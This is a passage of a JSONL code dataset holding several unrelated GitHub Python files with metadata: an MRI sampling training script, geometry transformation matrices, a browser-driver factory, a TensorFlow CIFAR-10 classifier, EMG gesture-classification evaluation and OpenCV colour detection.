(args.use_rms_prop == 1)\n args.center_volume = (args.center_volume == 1)\n\n # save\n os.makedirs(args.checkpoints_dir, exist_ok=True)\n with open(args.checkpoints_dir+'/commandline_args.txt', 'w') as f:\n json.dump(args.__dict__, f, indent=2)\n \n return args\n\nif __name__ == \"__main__\":\n args = build_args()\n set_random_seeds(args)\n torch.set_num_threads(args.num_workers)\n train(args)", "repo_name": "yangpuPKU/L2SR-Learning-to-Sample-and-Reconstruct", "sub_path": "train_sparse.py", "file_name": "train_sparse.py", "file_ext": "py", "file_size_in_byte": 6437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.use", "line_number": 14, "usage_type": "call"}, {"api_name": "activemri.envs.sparse_vecenvs.SparseVecEnv", "line_number": 20, "usage_type": "call"}, {"api_name": "activemri.feature_extractor.extractor.Extractor", "line_number": 31, "usage_type": "attribute"}, {"api_name": "activemri.feature_extractor.extractor", "line_number": 31, "usage_type": "name"}, {"api_name": "stable_baselines3.A2C", "line_number": 38, "usage_type": "call"}, {"api_name": "activemri.feature_extractor.extractor.Action_net", "line_number": 54, "usage_type": "call"}, {"api_name": "activemri.feature_extractor.extractor", "line_number": 54, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 69, 
"usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 70, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 74, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 150, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.set_num_threads", "line_number": 159, "usage_type": "call"}]}
+{"seq_id": "10287168699", "text": "\"\"\"\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom math import cos\nfrom math import sin\n\nfrom compas.geometry import normalize_vector\nfrom compas.geometry import multiply_matrices\n\n\n__author__ = ['Tom Van Mele ',\n 'Andrew Liew ']\n__copyright__ = 'Copyright 2016, Block Research Group - ETH Zurich'\n__license__ = 'MIT License'\n__email__ = 'vanmelet@ethz.ch'\n\n\n__all__ = [\n 'translation_matrix',\n 'rotation_matrix',\n 'scale_matrix',\n 'shear_matrix',\n 'projection_matrix'\n]\n\n\n# notes:\n# - add object oriented interface\n# - quaternions?\n# - quaternion math?\n# - functions to apply transformations\n# - homogenization\n# - dehomogenization\n# - Matrix.apply\n# - Matrix.factory\n# - ...\n\n\ndef translation_matrix(direction):\n \"\"\"Creates a translation matrix to translate vectors.\n\n Parameters:\n direction (list): The x, y and z components of the translation.\n\n Returns:\n list: The (4 x 4) translation matrix.\n\n Homogeneous vectors are used, i.e. vector [x, y, z].T is represented as\n [x, y, z, 1].T. Matrix multiplication of the translation matrix with the\n homogeneous vector will return the new translated vector.\n\n Examples:\n >>> T = translation_matrix([1, 2, 3])\n [[1 0 0 1]\n [0 1 0 2]\n [0 0 1 3]\n [0 0 0 1]]\n \"\"\"\n return [[1.0, 0.0, 0.0, direction[0]],\n [0.0, 1.0, 0.0, direction[1]],\n [0.0, 0.0, 1.0, direction[2]],\n [0.0, 0.0, 0.0, 1.0]]\n\n\ndef rotation_matrix(angle, direction, point=None):\n \"\"\"Creates a rotation matrix for rotating vectors around an axis.\n\n Parameters:\n angle (float): Angle in radians to rotate by.\n direction (list): The x, y and z components of the rotation axis.\n\n Returns:\n list: The (3 x 3) rotation matrix.\n\n Rotates a vector around a given axis (the axis will be unitised), the\n rotation is based on the right hand rule, i.e. anti-clockwise when the axis\n of rotation points towards the observer.\n\n Examples:\n >>> R = rotation_matrix(angle=pi/2, direction=[0, 0, 1])\n [[ 6.12-17 -1.00+00 0.00+00]\n [ 1.00+00 6.12-17 0.00+00]\n [ 0.00+00 0.00+00 1.00+00]]\n \"\"\"\n # To perform a rotation around an arbitrary line (i.e. an axis not through\n # the origin) an origin other than (0, 0, 0) may be provided for the\n # direction vector. 
Note that the returned 'rotation matrix' is then\n # composed of three translations and a rotation: Tp-1 Txy-1 Tz-1 R Tz Txy Tp\n # l = sum(direction[i] ** 2 for i in range(3)) ** 0.5\n # u = [direction[i] / l for i in range(3)]\n x, y, z = normalize_vector(direction)\n c = cos(angle)\n t = 1 - c\n s = sin(angle)\n R = [\n [t * x * x + c , t * x * y - s * z, t * x * z + s * y, 0.0],\n [t * x * y + s * z, t * y * y + c , t * y * z - s * x, 0.0],\n [t * x * z - s * y, t * y * z + s * x, t * z * z + c , 0.0],\n [0.0 , 0.0 , 0.0 , 1.0]\n ]\n\n if point is None:\n return R\n\n T1 = translation_matrix([-p for p in point])\n T2 = translation_matrix(point)\n\n return multiply_matrices(T2, multiply_matrices(R, T1))\n\n\ndef scale_matrix(x, y=None, z=None):\n \"\"\"Creates a scale matrix to scale vectors.\n\n Parameters:\n factor (float): Uniform scale factor for the x, y and z components.\n\n Returns:\n list: The (3 x 3) scale matrix.\n\n The scale matrix is a (3 x 3) matrix with the scale factor along all of the\n three diagonal elements, used to scale a vector.\n\n Examples:\n >>> S = scale_matrix(2)\n [[2 0 0]\n [0 2 0]\n [0 0 2]]\n \"\"\"\n if y is None:\n y = x\n if z is None:\n z = x\n return [[x, 0.0, 0.0, 0.0],\n [0.0, y, 0.0, 0.0],\n [0.0, 0.0, z, 0.0],\n [0.0, 0.0, 0.0, 1.0]]\n\n\ndef shear_matrix():\n pass\n\n\ndef projection_matrix():\n raise NotImplementedError\n\n\n# ==============================================================================\n# Debugging\n# ==============================================================================\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "garciadelcastillo/DynamoCompas", "sub_path": "package/DynamoCompas/bin/compas/geometry/xforms.py", "file_name": "xforms.py", "file_ext": "py", "file_size_in_byte": 4262, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "compas.geometry.normalize_vector", "line_number": 93, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 94, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 96, "usage_type": "call"}, {"api_name": "compas.geometry.multiply_matrices", "line_number": 110, "usage_type": "call"}]}
+{"seq_id": "7727856984", "text": "from playwright.sync_api import sync_playwright, Playwright, Page\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.firefox.webdriver import WebDriver\nfrom selenium.webdriver.ie.service import Service\nfrom selenium.webdriver.ie.webdriver import WebDriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\nfrom webdriver_manager.microsoft import IEDriverManager\n\n\nclass WebDriverFactory:\n _driver: WebDriver = None\n _driver: Page = None\n _playwright_browser: Playwright = None\n\n def open_browser(self, browserName):\n if browserName == \"chrome\":\n _driver = webdriver.Chrome(ChromeDriverManager().install())\n elif browserName == \"firefox\":\n _driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n elif browserName == \"ie\":\n _driver = webdriver.Ie(service=Service(IEDriverManager().install()))\n else:\n print('Browser type not found - ' + browserName)\n raise Exception('Browser type not found - ' + browserName)\n self._driver = _driver\n self._driver.maximize_window()\n self._driver.delete_all_cookies()\n return self._driver\n\n def close_browser(self):\n self._driver.close()\n\n def open_play_wright_browser(self, browserName):\n print(\"Entering open_playwright_browser\")\n if browserName == \"chrome\":\n playwright_browser = sync_playwright().start()\n browser = playwright_browser.chromium.launch(headless=False, slow_mo=50)\n driver = browser.new_page()\n\n elif browserName == \"firefox\":\n playwright_browser = sync_playwright().start()\n playwright_browser.firefox.launch(headless=False, slow_mo=50)\n driver = playwright_browser.new_page()\n elif browserName == \"ie\":\n playwright_browser = sync_playwright().start()\n playwright_browser.chromium.launch(headless=False, slow_mo=50)\n driver = playwright_browser.new_page()\n else:\n print('Browser type not found - ' + browserName)\n raise Exception('Browser type not found - ' + browserName)\n self._driver = driver\n\n def close_play_wight_browser(self):\n self._driver.close()\n self._playwright_browser.stop()\n", "repo_name": "prsnth89/PythonBehaveTest", "sub_path": "main/clientfactory/webdriver_factory.py", "file_name": "webdriver_factory.py", "file_ext": "py", "file_size_in_byte": 2402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "selenium.webdriver.ie.webdriver.WebDriver", "line_number": 13, "usage_type": "name"}, {"api_name": "playwright.sync_api.Page", "line_number": 14, "usage_type": "name"}, {"api_name": "playwright.sync_api.Playwright", "line_number": 15, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 19, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 21, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 21, "usage_type": "name"}, {"api_name": "webdriver_manager.firefox.GeckoDriverManager", "line_number": 21, "usage_type": "call"}, {"api_name": "selenium.webdriver.Ie", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.ie.service.Service", "line_number": 23, "usage_type": "call"}, 
{"api_name": "webdriver_manager.microsoft.IEDriverManager", "line_number": 23, "usage_type": "call"}, {"api_name": "playwright.sync_api.sync_playwright", "line_number": 38, "usage_type": "call"}, {"api_name": "playwright.sync_api.sync_playwright", "line_number": 43, "usage_type": "call"}, {"api_name": "playwright.sync_api.sync_playwright", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "9514780946", "text": "import tensorflow as tf\nimport random\nimport numpy as np\nfrom keras.datasets import cifar10\n\ntf.set_random_seed(777)\n\n# CIFAR_10은 3채널로 구성된 32*32 이미지 60000장을 갖는다.\nIMG_CHANNELS = 3\nIMG_ROWS = 32\nIMG_COLS = 32\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\nx = tf.placeholder(tf.float32, [None, IMG_ROWS, IMG_COLS, IMG_CHANNELS])\ny = tf.placeholder(tf.int32, [None, 1])\n\ny_one_hot = tf.one_hot(y, 10)\ny_one_hot = tf.reshape(y_one_hot, [-1, 10])\n\nw1 = tf.Variable(tf.random_normal([3, 3, IMG_CHANNELS, 32]))\nlayer1 = tf.nn.conv2d(x, w1, strides=[1, 1, 1, 1], padding='SAME')\nlayer1 = tf.nn.relu(layer1)\nlayer1 = tf.nn.max_pool(layer1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\nw2 = tf.Variable(tf.random_normal([3, 3, 32, 64]))\nlayer2 = tf.nn.conv2d(layer1, w2, strides=[1, 1, 1, 1], padding='SAME')\nlayer2 = tf.nn.relu(layer2)\n\nw3 = tf.Variable(tf.random_normal([3, 3, 64, 128]))\nlayer3 = tf.nn.conv2d(layer2, w3, strides=[1, 1, 1, 1], padding='SAME')\nlayer3 = tf.nn.relu(layer3)\n\nflat = tf.reshape(layer3, [-1, 16 * 16 * 128])\n\nw = tf.get_variable('w', shape=[16 * 16 * 128, 10],\n initializer=tf.contrib.layers.xavier_initializer())\nb = tf.Variable(tf.random_normal([10]))\nlogits = tf.matmul(flat, w) + b\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=y_one_hot))\noptimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n\n\ndef next_batch(num, data, labels):\n '''\n `num` 개수 만큼의 랜덤한 샘플들과 레이블들을 리턴합니다.\n '''\n idx = np.arange(0 , len(data))\n np.random.shuffle(idx)\n idx = idx[:num]\n data_shuffle = [data[i] for i in idx]\n labels_shuffle = [labels[i] for i in idx]\n\n return np.asarray(data_shuffle), np.asarray(labels_shuffle)\n\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\ntraining_epochs = 10\nbatch_size = 100\nnum_examples = len(x_train)\nfor epoch in range(training_epochs):\n avg_cost = 0\n total_batch = int(x_train.shape[0] / batch_size) # batch_size\n\n for i in range(total_batch):\n batch_xs, batch_ys = next_batch(batch_size, x_train, y_train)\n\n feed_dict = {x: batch_xs, y: batch_ys}\n c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)\n avg_cost += c / total_batch\n \n print('Epoch: ', '%04d' % (epoch + 1), 'cost = ', '{:9f}'.format(avg_cost))\n\n\n# Test model and check accuracy\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(y_one_hot, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nprint('Accuracy: ', sess.run(accuracy, feed_dict={x: x_test, y: y_test}))\n\n# Get one and predict\nr = random.randint(0, len(x_test) - 1)\n# print('Label: ', sess.run(tf.argmax(x_test[r:r + 1], 1)))\nprint('Prediction: ', sess.run(tf.argmax(logits, 1), feed_dict={x: x_test[r:r + 1]}))\n", "repo_name": "jamiedotpro/etc", "sub_path": "tf/tf19_cifar10.py", "file_name": "tf19_cifar10.py", "file_ext": "py", "file_size_in_byte": 2999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "tensorflow.set_random_seed", "line_number": 6, "usage_type": "call"}, {"api_name": "keras.datasets.cifar10.load_data", "line_number": 13, "usage_type": "call"}, {"api_name": "keras.datasets.cifar10", "line_number": 13, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 18, "usage_type": 
"call"}, {"api_name": "tensorflow.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.max_pool", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits_v2", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 82, "usage_type": "call"}, {"api_name": 
"tensorflow.argmax", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 83, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 89, "usage_type": "call"}]}
+{"seq_id": "71929097687", "text": "import seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix, classification_report\nimport EMG_FCNs_250 as FCNs\nimport pandas as pd\n#############################################################################################################################\nsfreq = 1000 #sample Frequency\nlow_pass = 3 #cut off frequency for enveloped signal\nhigh_band = 20 #cut off frequency for raw signal\nlow_band = 450 #cut off frequency for raw signal\nnotch_freq = 50 #Notch frequency 50/60Hz depends on grid\nwindow_size=250 #Data segment for Feature extraction\noverlap=250\nx = 0 #Overlap of Segments: Window_size - overlap\nlabel_name = 'test_data'\nrun = 3\n# Fist = 1 ; Pinch = 2; Thumb = 3; Spread = 4\n\nlabel_list_1 = [2, 4, 4, 3, 2, 1, 3, 1, 3, 1]\nlabel_list_2 = [3, 2, 1, 2, 3, 4, 3, 2, 1, 4]\nlabel_list_3 = [3, 2, 4, 1, 2, 4, 2, 3, 2, 1]\nlabel_list_4 = [1, 1, 3, 3, 1, 4, 4, 2, 3, 3]\nlabel_list_5 = [2, 4, 1, 3, 2, 3, 3, 4, 3, 2]\nlabel_list_6 = [3, 4, 1, 1, 4, 4, 2, 3, 2, 4]\nlabel_list_7 = [3, 3, 4, 4, 1, 3, 1, 4, 2, 2]\nlabel_list_8 = [1, 1, 4, 3, 2, 1, 2, 3, 1, 3]\nlabel_list_9 = [4, 4, 2, 3, 1, 1, 3, 4, 2, 1]\nlabel_list_10 =[2, 3, 4, 4, 3, 1, 4, 2, 1, 4]\n\nlabel_list = [\n    label_list_1,\n    label_list_2,\n    label_list_3,\n    label_list_4,\n    label_list_5,\n    label_list_6,\n    label_list_7,\n    label_list_8,\n    label_list_9,\n    label_list_10\n]\n\ndef get_element_at_index(label_list, index):\n    if index < 0 or index >= len(label_list):\n        return None\n    return label_list[index]\n\n\nlabel_list = get_element_at_index(label_list, run-1)\n\ntest_path = r'C:\\Users\\Peter Rott\\Desktop\\Masterthesis\\Coding\\PYTHON_files\\Real_time_classification\\Test_sequences'\nfilename = r'./Data/Data_0%s.txt'%run\nlabel_file = r'./Label/Label_0%s.txt'%run\n\n#Import EMG data\ncolum_names = ['emg_1','emg_2','emg_3','emg_4','emg_5','emg_6'] \nraw_data = pd.read_csv(test_path+filename, delimiter=';', names=colum_names)\nlabel_data = pd.read_csv(test_path + label_file, names= ['Label'])\nemg_sum_data = raw_data.iloc[:, :6].sum(axis=1)/6 \n\n#new_row = [0]\n#label_data = label_data.append(pd.Series(new_row, index=label_data.columns), ignore_index=True) #build an avg of all sensor data\n#############################################################################################################################  \n    \n#Signal processing for each sensor\ntime = FCNs.time_calc(raw_data) #calculates the recorded time with the sensor samples\nemg_without_offset = FCNs.remove_mean(raw_data,time,250) #removing the offset of the EMG signal\nfiltered_emg = FCNs.filteremg(time, emg_without_offset, low_pass, sfreq, high_band, low_band,notch_freq) #filters the EMG signal with bandpass and notch filter\nfiltered_emg = pd.DataFrame(filtered_emg)\n#############################################################################################################################\n    \n#Signal processing for the avg sensor values\nemg_sum_data_df = emg_sum_data.to_frame() #transformation to data frame\nemg_sum_without_offset = FCNs.remove_mean (emg_sum_data_df,time,250) #removing the offset of the EMG signal\nfiltered_emg_sum = FCNs.filteremg(time, emg_sum_without_offset, low_pass, sfreq, high_band, low_band,notch_freq) #filters the EMG signal with bandpass and notch filter\nfiltered_emg_sum =pd.DataFrame(filtered_emg_sum)\n#############################################################################################################################\n    \n#Feature extraction\n
emg_features = FCNs.extract_emg_features(filtered_emg, window_size, overlap) #Feature extraction\nemg_features_sum = FCNs.extract_emg_features(filtered_emg_sum, window_size, overlap)\nWL_sum = FCNs.calculate_wave_length(filtered_emg_sum, window_size, overlap)\nemg_features_WL_sum = pd.concat([emg_features, WL_sum], axis=1)\n\n#############################################################################################################################\n    \n#Data labelling\nemg_features_labeled, label, wl_threshold, line_values = FCNs.label_emg_features(emg_features_WL_sum, label_name, x) #Feature labeling\nemg_features_replaced = FCNs.replace_zero_labels(emg_features_labeled, label) \nfor i in range(2):\n    emg_features_final = FCNs.replace_labels_zero(emg_features_replaced,label) #replace wrongly detected labels\n\nemg_features_with_correct_label = FCNs.replace_labels(emg_features_replaced['Label'], label_list)\nemg_features_replaced['Label'] = emg_features_with_correct_label\n\nFCNs.plot_WL(emg_features_replaced, wl_threshold, 'Wavelength feature of the gesture '+label_name)\nemg_features_final = emg_features_replaced.drop('WL_sum', axis=1)\nemg_features_sum_final = emg_features_sum.assign(Label=emg_features_final['Label'])\n\nplot_data = emg_features_sum_final [[\"Label\"]]\nFCNs.plot_features (plot_data,raw_data.iloc[:, 1],time,'')\nFCNs.plot_labels(plot_data,filtered_emg.iloc[:, 1],time,'Correct labels and the predicted Labels',label_data)\n#############################################################################################################################\n\ndef print_confusion_matrix(y_true, y_pred, title, report=True):\n    labels = sorted(list(set(y_true)))\n    cmx_data = confusion_matrix(y_true, y_pred, labels=labels)\n    df_cmx = pd.DataFrame(cmx_data, index=labels, columns=labels)\n    fig, ax = plt.subplots(figsize=(7, 6))\n    sns.heatmap(df_cmx, annot=True, fmt='g' ,square=False)\n    ax.set_ylim(len(set(y_true)), 0)\n    ax.set_title(title)\n    plt.show()\n    \n    if report:\n        print('Classification Report')\n        print(classification_report(y_true, y_pred))\n\ny_true = emg_features_final.loc[:, \"Label\"]\nprint_confusion_matrix(y_true, label_data, 'Confusion Matrix for ANN real time classification')", "repo_name": "PeterR96/EMG_wristband_to-_control_virtual_hand_prosthesis", "sub_path": "Code/PYTHON_files/Load_and_procsess_Data/Confusion_real_time_data.py", "file_name": "Confusion_real_time_data.py", "file_ext": "py", "file_size_in_byte": 6464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 58, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.time_calc", "line_number": 66, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.remove_mean", "line_number": 67, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.filteremg", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.remove_mean", "line_number": 74, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.filteremg", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 76, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.extract_emg_features", "line_number": 80, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.extract_emg_features", "line_number": 81, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.calculate_wave_length", 
"line_number": 82, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 83, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.label_emg_features", "line_number": 88, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.replace_zero_labels", "line_number": 89, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.replace_labels_zero", "line_number": 91, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.replace_labels", "line_number": 93, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.plot_WL", "line_number": 96, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.plot_features", "line_number": 101, "usage_type": "call"}, {"api_name": "EMG_FCNs_250.plot_labels", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 117, "usage_type": "call"}]}
+{"seq_id": "13140214980", "text": "# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\nimport cv2\r\nimport numpy as np\r\n\r\nlowerBoundb = np.array([100, 100, 102])\r\nupperBoundb = np.array([130, 255, 255])\r\n\r\nlowerBoundg = np.array([70, 50, 51])\r\nupperBoundg = np.array([90, 255, 255])\r\n\r\ncam = cv2.VideoCapture(1)\r\nkernelOpen = np.ones((5, 5))\r\nkernelClose = np.ones((20, 20))\r\n\r\nwhile True:\r\n ret, img = cam.read()\r\n img = cv2.resize(img, (340, 220))\r\n\r\n # convert BGR to HSV\r\n imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n # create the Mask\r\n maskb = cv2.inRange(imgHSV, lowerBoundb, upperBoundb)\r\n maskg = cv2.inRange(imgHSV, lowerBoundg, upperBoundg)\r\n # morphology\r\n maskOpenb = cv2.morphologyEx(maskb, cv2.MORPH_OPEN, kernelOpen)\r\n maskCloseb = cv2.morphologyEx(maskOpenb, cv2.MORPH_CLOSE, kernelClose)\r\n\r\n maskOpeng = cv2.morphologyEx(maskg, cv2.MORPH_OPEN, kernelOpen)\r\n maskCloseg = cv2.morphologyEx(maskOpeng, cv2.MORPH_CLOSE, kernelClose)\r\n\r\n maskFinalb = maskCloseb\r\n maskFinalg = maskCloseg\r\n contsb, hb = cv2.findContours(maskFinalb.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n contsg, hg = cv2.findContours(maskFinalg.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n\r\n cv2.drawContours(img, contsb, -1, (255, 0, 0), 3)\r\n print(\"blue\")\r\n print(len(contsb))\r\n print(\"green\")\r\n cv2.drawContours(img, contsg, -1, (255, 0, 0), 3)\r\n print(len(contsg))\r\n\r\n cv2.imshow(\"maskb\", maskb)\r\n cv2.imshow(\"maskg\", maskg)\r\n cv2.imshow(\"cam\", img)\r\n cv2.waitKey(10)", "repo_name": "rospodu98/Automated_Traffic_Light_Controller", "sub_path": "multicolorcar.py", "file_name": "multicolorcar.py", "file_ext": "py", "file_size_in_byte": 1529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.morphologyEx", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.MORPH_OPEN", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 
